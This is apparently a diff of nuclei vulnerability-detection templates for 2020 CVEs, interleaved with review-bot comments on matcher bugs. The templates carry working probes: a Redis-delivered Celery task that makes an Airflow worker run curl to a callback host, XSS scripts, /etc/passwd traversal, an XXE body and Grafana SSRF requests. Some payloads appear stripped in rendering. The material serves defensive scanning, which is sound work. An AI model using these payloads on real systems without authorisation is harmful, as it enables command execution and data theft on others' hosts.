@@ -0,0 +1,37 @@ +id: CVE-2020-11854 + +info: + name: Micro Focus UCMDB RCE + author: dwisiswant0 + severity: critical + reference: http://packetstormsecurity.com/files/161182/Micro-Focus-UCMDB-Remote-Code-Execution.html + description: | + This template supports the detection part only. + + UCMDB included in versions 2020.05 and below of Operations Bridge Manager are affected, + but this template can probably also be used to detect Operations Bridge Manager + (containeirized) and Application Performance Management. + + Originated from Metasploit module (#14654). + tags: cve,cve2020,ucmdb,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-11854 + cwe-id: CWE-798 + +requests: + - method: GET + path: + - "{{BaseURL}}/ucmdb-api/connect" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "HttpUcmdbServiceProviderFactoryImpl" + - "ServerVersion=11.6.0" + part: body + condition: and \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-11930.yaml b/nuclei-templates/CVE-2020/CVE-2020-11930.yaml deleted file mode 100644 index 3d90c29e03..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-11930.yaml +++ /dev/null 
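Review bot: The body matcher requires the exact string `ServerVersion=11.6.0`, so any other UCMDB build that the description says is affected (Operations Bridge Manager 2020.05 and below) is reported clean; unless 11.6.0 is the only version this check is meant to catch, a comment stating that limitation should be added above the `words:` list, or the version match relaxed with a regex matcher on `ServerVersion=`. The description also has a typo, `containeirized`, which should read `containerized`. Pointing the single `reference:` at a list with the NVD entry would match the other templates in this commit.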
@@ -1,35 +0,0 @@ -id: CVE-2020-11930 -info: - name: WordPress Plugin "Translate WordPress with GTranslate" (gtranslate) XSS - author: dhiyaneshDK - severity: medium - description: | - The GTranslate plugin before 2.8.52 for WordPress was vulnerable to an Unauthenticated Reflected XSS vulnerability via a crafted link. This requires use of the hreflang tags feature within a sub-domain or sub-directory paid option. - reference: - - https://wpscan.com/vulnerability/10181 - - https://payatu.com/blog/gaurav/analysis-of-cve-2020-11930:-reflected-xss-in-gtranslate-wordpress-module - - https://plugins.trac.wordpress.org/changeset/2245581/gtranslate - - https://plugins.trac.wordpress.org/changeset/2245591/gtranslate - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2020-11930 - cwe-id: CWE-79 - tags: cve,cve2020,wordpress,xss,plugin -requests: - - method: GET - path: - - '{{BaseURL}}/does_not_exist"%22%3E%3Cscript%3Ealert("XSS")%3C/script%3Ealert("XSS")' - - type: word - part: header - words: - - "text/html" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2020/CVE-2020-11981.yaml b/nuclei-templates/CVE-2020/CVE-2020-11981.yaml index d5951f7dc7..a71f9ce3bb 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-11981.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-11981.yaml 
@@ -6,35 +6,56 @@ info: severity: critical description: | An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the celery worker running arbitrary commands. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system. + remediation: Upgrade apache-airflow to version 1.10.11 or higher. reference: - https://github.com/apache/airflow/pull/9178 - https://github.com/vulhub/vulhub/tree/master/airflow/CVE-2020-11981 - remediation: Upgrade apache-airflow to version 1.10.11 or higher. + - https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E + - https://github.com/t0m4too/t0m4to + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-11981 cwe-id: CWE-78 - epss-score: 0.936930000 + epss-score: 0.9386 + epss-percentile: 0.99081 + cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 2 + vendor: apache + product: airflow shodan-query: product:"redis" - verified: true tags: cve,cve2020,network,redis,unauth,apache,airflow,vulhub,intrusive - variables: - data: "*3\r\n$5\r\nLPUSH\r\n$7\r\ndefault\r\n$936\r\n{\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"delivery_info\": {\"routing_key\": \"celery\", \"exchange\": \"\"}, \"reply_to\": \"fb996eec-3033-3c10-9ee1-418e1ca06db8\"}, \"content-type\": \"application/json\", \"headers\": {\"retries\": 0, \"lang\": \"py\", \"argsrepr\": \"(100, 200)\", \"expires\": null, \"task\": 
\"airflow.executors.celery_executor.execute_command\", \"kwargsrepr\": \"{}\", \"root_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"parent_id\": null, \"id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"origin\": \"gen1@132f65270cde\", \"eta\": null, \"group\": null, \"timelimit\": [null, null]}, \"body\": \"" + data: "*3\r + + $5\r + + LPUSH\r + + $7\r + + default\r + + $936\r + + {\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"delivery_info\": {\"routing_key\": \"celery\", \"exchange\": \"\"}, \"reply_to\": \"fb996eec-3033-3c10-9ee1-418e1ca06db8\"}, \"content-type\": \"application/json\", \"headers\": {\"retries\": 0, \"lang\": \"py\", \"argsrepr\": \"(100, 200)\", \"expires\": null, \"task\": \"airflow.executors.celery_executor.execute_command\", \"kwargsrepr\": \"{}\", \"root_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"parent_id\": null, \"id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"origin\": \"gen1@132f65270cde\", \"eta\": null, \"group\": null, \"timelimit\": [null, null]}, \"body\": \"" encode1: '[[["curl", "http://' encode2: '"]], {}, {"chain": null, "chord": null, "errbacks": null, "callbacks": null}]' end: '"}' - tcp: - inputs: - - data: "{{data+base64(encode1+'{{interactsh-url}}'+encode2)+concat(end+ '\r\n')}}" + - data: "{{data+base64(encode1+'{{interactsh-url}}'+encode2)+concat(end+ '\r + + ')}}" read: 1024 host: - "{{Hostname}}" - port: 6379 + - "{{Host}}:6379" matchers-condition: and matchers: @@ -47,3 +68,4 @@ tcp: part: interactsh_request words: - "User-Agent: curl" +# digest: 4a0a0047304502203c3d6f6dd85e588f87e0a6431df2c54e99a8ba26b833fbc6d60adfc2e84e5592022100ea5606a791f03c7c31c914589e437fa299e4a75d4f4f187cae1e0e0247a52fde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2020/CVE-2020-11991.yaml b/nuclei-templates/CVE-2020/CVE-2020-11991.yaml deleted file mode 100644 index 62b14672c5..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-11991.yaml +++ /dev/null @@ -1,44 +0,0 @@ -id: CVE-2020-11991 - -info: - name: Apache Cocoon 2.1.12 XML Injection - author: pikpikcu - severity: high - description: Apache Cocoon 2.1.12 is susceptible to XML injection. When using the StreamGenerator, the code parses a user-provided XML. A specially crafted XML, including external system entities, can be used to access any file on the server system. - remediation: Upgrade to Apache Cocoon 2.1.13 or later. - reference: - - https://lists.apache.org/thread/6xg5j4knfczwdhggo3t95owqzol37k1b - - https://nvd.nist.gov/vuln/detail/CVE-2020-11991 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cve-id: CVE-2020-11991 - cwe-id: CWE-611 - tags: cve,cve2020,apache,xml,cocoon,xxe - -requests: - - method: POST - path: - - "{{BaseURL}}/v2/api/product/manger/getInfo" - headers: - Content-Type: "text/xml" - body: | - - ]> - - John - &ent; - - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/05 diff --git a/nuclei-templates/CVE-2020/CVE-2020-12127.yaml b/nuclei-templates/CVE-2020/CVE-2020-12127.yaml index 09398bfcdf..f49348ba37 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-12127.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-12127.yaml 
@@ -6,21 +6,33 @@ info: severity: high description: | WAVLINK WN530H4 M30H4.V5030.190403 contains an information disclosure vulnerability in the /cgi-bin/ExportAllSettings.sh endpoint. This can allow an attacker to leak router settings, including cleartext login details, DNS settings, and other sensitive information without authentication. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information, such as router configuration settings and user credentials. + remediation: | + Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability. reference: - https://cerne.xyz/bugs/CVE-2020-12127 - https://www.wavlink.com/en_us/product/WL-WN530H4.html - https://nvd.nist.gov/vuln/detail/CVE-2020-12127 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-12127 cwe-id: CWE-306 + epss-score: 0.06293 + epss-percentile: 0.93458 + cpe: cpe:2.3:o:wavlink:wn530h4_firmware:m30h4.v5030.190403:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: wavlink + product: wn530h4_firmware shodan-query: http.html:"Wavlink" - verified: "true" tags: cve,cve2020,wavlink,exposure -requests: +http: - method: GET path: - "{{BaseURL}}/cgi-bin/ExportAllSettings.sh" @@ -39,5 +51,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/02/01 +# digest: 4b0a00483046022100dffbff0cc3444989ae4c3286f2188aabc64aed833325784119cb5011f1a954ba022100a340bd327ffe1705d7ab2e5a234fb95df02461a432dbbafbcf937d1d7da6f52a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-12256.yaml b/nuclei-templates/CVE-2020/CVE-2020-12256.yaml index 9801f542d0..bf22dc4ca5 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-12256.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-12256.yaml 
@@ -1,24 +1,54 @@ -id: cve-2020-12256 +id: CVE-2020-12256 + info: - name: rConfig 3.9.4 XSS - author: pikpikcu + name: rConfig 3.9.4 - Cross-Site Scripting + author: r3Y3r53 severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2020-12256 - tags: cve,cve2020,rconfig,xss -requests: - - method: GET - path: - - '{{BaseURL}}/devicemgmt.php?deviceId=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E' - matchers-condition: and + description: | + The rConfig 3.9.4 is vulnerable to cross-site scripting. The devicemgmnt.php file improperly validates the request coming from the user input. Due to this flaw, An attacker can exploit this vulnerability by crafting arbitrary javascript in `deviceId` GET parameter of devicemgmnt.php resulting in execution of the javascript. + reference: + - https://www.rconfig.com/downloads/rconfig-3.9.4.zip + - https://gist.github.com/farid007/8855031bad0e497264e4879efb5bc9f8 + - https://nvd.nist.gov/vuln/detail/CVE-2020-12256 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Elsfa7-110/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2020-12256 + cwe-id: CWE-79 + epss-score: 0.17512 + epss-percentile: 0.95674 + cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:* + metadata: + verified: "true" + max-request: 3 + vendor: rconfig + product: rconfig + shodan-query: http.title:"rConfig" + tags: cve,cve2020,rconfig,authenticated,xss + +http: + - raw: + - | + GET /login.php HTTP/1.1 + Host: {{Hostname}} + - | + POST /lib/crud/userprocess.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + user={{username}}&pass={{password}}&sublogin=1 + - | + GET /devicemgmt.php?deviceId="> HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true matchers: - - type: word - words: - - "" - part: body - - type: status - status: - - 200 - - type: word - part: header - words: - - "text/html" + - type: dsl + dsl: + 
- 'status_code_3 == 200' + - 'contains(body_3, "") && contains(body_3, "rConfig - Configuration Management")' + - 'contains(content_type_3, "text/html")' + condition: and +# digest: 490a0046304402203df7f7a1fafc6740fbc98163bb2959e9bd581ba8ddfd68573ca0af9a64f081ab02202b23a11ef0e6910123ef3657ed3d2374c3748e4f25a59b1d9d7f2e20b40dd381:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-12259.yaml b/nuclei-templates/CVE-2020/CVE-2020-12259.yaml deleted file mode 100644 index 27ad2d9441..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-12259.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: cve-2020-12259 - -info: - name: rConfig 3.9.4 XSS - author: pikpikcu - severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2020-12259 - tags: cve,cve2020,rconfig,xss - -requests: - - method: GET - path: - - '{{BaseURL}}/configDevice.php?rid=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - - type: word - words: - - "" - part: body - - - type: status - status: - - 200 - - - type: word - part: header - words: - - "text/html" diff --git a/nuclei-templates/CVE-2020/CVE-2020-12447.yaml b/nuclei-templates/CVE-2020/CVE-2020-12447.yaml new file mode 100644 index 0000000000..941f7e0b40 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-12447.yaml 
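Review bot: As rendered here the third request reads `GET /devicemgmt.php?deviceId="> HTTP/1.1` with no script payload, and the DSL line `contains(body_3, "")` tests for the empty string, which is true for every response; if the committed file really looks like this (rather than the angle-bracket payload having been stripped in rendering), the matcher is vacuous and any authenticated rConfig instance will be reported as vulnerable. Pin the check to the literal probe that is reflected, something like `contains(body_3, "<script>alert(document.domain)</script>")`, and keep the `rConfig - Configuration Management` title check as the secondary condition. The description also spells the file `devicemgmnt.php` twice while the request targets `devicemgmt.php`; the description should use the path actually requested.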
@@ -0,0 +1,45 @@
+id: CVE-2020-12447
+
+info:
+ name: Onkyo TX-NR585 Web Interface - Directory Traversal
+ author: 0x_Akoko
+ severity: high
+ description: Onkyo TX-NR585 1000-0000-000-0008-0000 devices allows remote unauthenticated users on the network to read sensitive files via %2e%2e%2f directory traversal and local file inclusion.
+ impact: |
+ An attacker can access sensitive files on the system, potentially leading to unauthorized access, information disclosure, or further exploitation.
+ remediation: |
+ Apply the latest firmware update provided by the vendor to fix the directory traversal vulnerability.
+ reference:
+ - https://blog.spookysec.net/onkyo-lfi
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-12447
+ - https://blog.spookysec.net/onkyo-lfi/
+ - https://github.com/ARPSyndicate/kenzer-templates
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2020-12447
+ cwe-id: CWE-22
+ epss-score: 0.01711
+ epss-percentile: 0.8752
+ cpe: cpe:2.3:o:onkyo:tx-nr585_firmware:1000-0000-000-0008-0000:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: onkyo
+ product: tx-nr585_firmware
+ tags: cve,cve2020,onkyo,lfi,traversal
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 200
+# digest: 4b0a00483046022100927c1a44689d7680e0dee3d0c8c5daf8e08fd834eb2fbb5cfea86f3a531c00b9022100c9621cde469f6eace4647eeeb2c70aeea221843a6410e3c169dd9a1f9d162936:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2020/CVE-2020-12478.yaml b/nuclei-templates/CVE-2020/CVE-2020-12478.yaml
index ed7969f61c..da5cb58c9e 100644
--- a/nuclei-templates/CVE-2020/CVE-2020-12478.yaml
+++ b/nuclei-templates/CVE-2020/CVE-2020-12478.yaml
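Review bot: The regex `root:[x*]:0:0` only accepts `x` or `*` in the password field; embedded firmware images not infrequently ship `/etc/passwd` with an empty field or an inline hash (`root::0:0`, `root:$1$...:0:0`), in which case a successful traversal on the receiver would be reported as not vulnerable. A slightly looser pattern such as `root:[^:]*:0:0` still anchors on the uid/gid pair and avoids that miss; the references do not show which form this device uses, so treat it as a robustness tweak rather than a confirmed miss. The reference list also cites the same spookysec post twice (with and without trailing slash); one entry is enough.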
@@ -6,20 +6,33 @@ info: severity: high description: | TeamPass 2.1.27.36 is susceptible to improper authentication. An attacker can retrieve files from the TeamPass web root, which may include backups or LDAP debug files, and therefore possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can bypass authentication and gain unauthorized access to sensitive information. + remediation: | + Upgrade to a patched version of TeamPass or apply the recommended security patches. reference: - https://github.com/nilsteampassnet/TeamPass/issues/2764 - https://nvd.nist.gov/vuln/detail/CVE-2020-12478 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/StarCrossPortal/scalpel classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-12478 cwe-id: CWE-306 + epss-score: 0.01186 + epss-percentile: 0.8478 + cpe: cpe:2.3:a:teampass:teampass:2.1.27.36:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: teampass + product: teampass shodan-query: http.html:"teampass" - verified: "true" - tags: cve,cve2020,teampass,exposure,unauth + tags: cve2020,cve,teampass,exposure,unauth -requests: +http: - method: GET path: - "{{BaseURL}}/files/ldap.debug.txt" @@ -39,5 +52,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/02/01 +# digest: 4a0a00473045022100d6f70c837b7c35ddacae603e0c1e3daa72b7f9d47c89a8c75302c0c8ed6e58d9022013c29b988bbbd1e577d673ae7d7e7f5afcb4c3660336ac45125a6db251230793:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-12720.yaml b/nuclei-templates/CVE-2020/CVE-2020-12720.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-12720.yaml rename to nuclei-templates/CVE-2020/CVE-2020-12720.yaml 
diff --git a/nuclei-templates/CVE-2020/cve-2020-12800.yaml b/nuclei-templates/CVE-2020/CVE-2020-12800.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-12800.yaml rename to nuclei-templates/CVE-2020/CVE-2020-12800.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-13121.yaml b/nuclei-templates/CVE-2020/CVE-2020-13121.yaml index 85e6f703ba..38db107834 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-13121.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-13121.yaml @@ -1,5 +1,4 @@ id: CVE-2020-13121 - info: name: Submitty 20.04.01 - Open redirect author: 0x_Akoko @@ -8,27 +7,18 @@ info: reference: - https://github.com/Submitty/Submitty/issues/5265 - https://www.cvedetails.com/cve/CVE-2020-13121 + tags: cve,cve2020,redirect,submitty classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 cve-id: CVE-2020-13121 cwe-id: CWE-601 - tags: cve,cve2020,redirect,submitty,oos - requests: - - raw: - - | - POST /authentication/check_login?old=http%253A%252F%252Fexample.com%252Fhome HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Referer: {{RootURL}}/authentication/login - - user_id={{username}}&password={{password}}&stay_logged_in=on&login=Login - - cookie-reuse: true + - method: GET + path: + - '{{BaseURL}}/authentication/login?old=http%3A%2F%2Flexample.com' matchers: - type: regex - part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' + part: header diff --git a/nuclei-templates/CVE-2020/CVE-2020-13258.yaml b/nuclei-templates/CVE-2020/CVE-2020-13258.yaml index 5034d00f30..9c8e3873f9 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-13258.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-13258.yaml 
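Review bot: The new request sends `old=http%3A%2F%2Flexample.com`, i.e. a redirect target of `http://lexample.com`, but the matcher regex only accepts a host that is `example.com` optionally preceded by a label and a literal dot, so `lexample.com` never matches and the template cannot fire even on a vulnerable Submitty. Either drop the stray `l` (`old=http%3A%2F%2Fexample.com`) or, better, use `{{interactsh-url}}` as the target and match `Location` on that, which also proves the redirect was issued rather than echoed. The replacement also switches from the previous authenticated POST to an unauthenticated GET on `/authentication/login`; whether Submitty honours `old` on that route without a session is not shown by the references, so removing the `oos` tag should be backed by a verified run.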
@@ -6,17 +6,30 @@ info: severity: medium description: | Contentful through 2020-05-21 for Python contains a reflected cross-site scripting vulnerability via the api parameter to the-example-app.py. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade Contentful to a version that is not vulnerable to CVE-2020-13258 or apply the necessary patches provided by the vendor. reference: - https://github.com/contentful/the-example-app.py/issues/44 - https://nvd.nist.gov/vuln/detail/CVE-2020-13258 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-13258 cwe-id: CWE-79 + epss-score: 0.00464 + epss-percentile: 0.7492 + cpe: cpe:2.3:a:contentful:python_example:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: contentful + product: python_example tags: cve,cve2020,contentful,xss -requests: +http: - raw: - | GET /?cda'"&locale=locale=de-DE HTTP/1.1 HTTP/1.1 @@ -38,5 +51,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/09/14 +# digest: 490a00463044022027c5f2643bd4cd615440112890d0d23c6b5ac5613534bf20e9b6c3f6e67fdac90220773833d83834dbacee963a6c0ea63557e73c73e473d68647ce026eb13c287f16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-13379.yaml b/nuclei-templates/CVE-2020/CVE-2020-13379.yaml index 72ae627c75..b3e76eb97f 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-13379.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-13379.yaml 
@@ -1,32 +1,59 @@ id: CVE-2020-13379 + info: - name: Grafana DoS Probing - author: medbsq + name: Grafana 3.0.1-7.0.1 - Server-Side Request Forgery + author: Joshua Rogers severity: high - #https://www.cvebase.com/cve/2020/13379 -requests: + description: | + Grafana 3.0.1 through 7.0.1 is susceptible to server-side request forgery via the avatar feature, which can lead to remote code execution. Any unauthenticated user/client can make Grafana send HTTP requests to any URL and return its result. This can be used to gain information about the network Grafana is running on, thereby potentially enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + An attacker can exploit this vulnerability to bypass security controls, access internal resources, and potentially perform further attacks. + remediation: Upgrade to 6.3.4 or higher. + reference: + - https://github.com/advisories/GHSA-wc9w-wvq2-ffm9 + - https://github.com/grafana/grafana/commit/ba953be95f0302c2ea80d23f1e5f2c1847365192 + - http://www.openwall.com/lists/oss-security/2020/06/03/4 + - https://nvd.nist.gov/vuln/detail/CVE-2020-13379 + - http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00060.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H + cvss-score: 8.2 + cve-id: CVE-2020-13379 + cwe-id: CWE-918 + epss-score: 0.76934 + epss-percentile: 0.97935 + cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: grafana + product: grafana + shodan-query: title:"Grafana" + tags: cve2020,cve,grafana,ssrf + +http: - method: GET path: - - "{{BaseURL}}/avatar/120" - - "{{BaseURL}}/grafana/avatar/120" - - "{{BaseURL}}/debug/grafana/avatar/120" - - "{{BaseURL}}/-/grafana/avatar/120" - - "{{BaseURL}}/gitlab/-/grafana/avatar/120" - - "{{BaseURL}}/-/debug/grafana/avatar/120" - headers: - User-Agent: Mozilla/5.0 (Windows 
NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + - "{{BaseURL}}/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1" + - "{{BaseURL}}/grafana/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1" + + stop-at-first-match: true + matchers-condition: and matchers: - type: word + part: body words: - - "IEND" - - "PNG" + - "cloudflare.com" + - "dns" condition: and - part: body + - type: word - words: - - "Content-Type: image/jpeg" part: header + words: + - "image/jpeg" + - type: status status: - 200 +# digest: 4a0a0047304502205b9bd2aa77748627d7df56b1f9ddb380e47285274318cb1a472d118ac7ea5dab022100e2b67b3e80048d92b7de1e74b9a632e18562312f42d046e47dde1538b01001e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-13405.yaml b/nuclei-templates/CVE-2020/CVE-2020-13405.yaml deleted file mode 100644 index 12407d9ae9..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-13405.yaml +++ /dev/null 
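Review bot: `remediation: Upgrade to 6.3.4 or higher.` contradicts the name and description in the same hunk, which list 3.0.1 through 7.0.1 as affected; a fix cannot predate 7.0.1, so the line should cite the patched releases from the referenced GHSA-wc9w-wvq2-ffm9 advisory (it gives the fixed 6.7.x and 7.0.x builds) rather than 6.3.4. Separately, the probe makes the scanned Grafana fetch `imgur.com/../1.1.1.1` and matches on `cloudflare.com`/`dns` in the proxied body, so the check depends on a live third-party host and sends the target's egress traffic there; an `{{interactsh-url}}` target with an `interactsh_protocol` matcher would be self-contained and attributable. The description's "can lead to remote code execution" is not supported by the CVSS vector shown (`C:L/I:N/A:H`) and might be softened.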
@@ -1,47 +0,0 @@ -id: CVE-2020-13405 - -info: - name: MicroWeber - Unauthenticated User Database Disclosure - author: ritikchaddha,amit-jd - severity: high - description: | - The PHP code for controller.php run Laravel's dump and die function on the users database. Dump and die simply prints the contents of the entire PHP variable (in this case, the users database) out to HTML. - reference: - - https://rhinosecuritylabs.com/research/microweber-database-disclosure/ - - https://nvd.nist.gov/vuln/detail/CVE-2020-13405 - - https://github.com/microweber/microweber/commit/269320e0e0e06a1785e1a1556da769a34280b7e6 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2020-13405 - cwe-id: CWE-306 - metadata: - shodan-query: http.html:"microweber" - verified: "true" - tags: cve,cve2020,microweber,unauth,disclosure - -requests: - - raw: - - | - POST /module/ HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Referer: {{BaseURL}}admin/view:modules/load_module:users - - module={{endpoint}} - - payloads: - endpoint: - - "users/controller" - - "modules/users/controller" - - "/modules/users/controller" - - matchers: - - type: dsl - dsl: - - 'contains(body,"username")' - - 'contains(body,"password")' - - 'contains(body,"password_reset_hash")' - - 'status_code==200' - - 'contains(all_headers,"text/html")' - condition: and diff --git a/nuclei-templates/CVE-2020/CVE-2020-13483.yaml b/nuclei-templates/CVE-2020/CVE-2020-13483.yaml deleted file mode 100644 index c029d81a5d..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-13483.yaml +++ /dev/null 
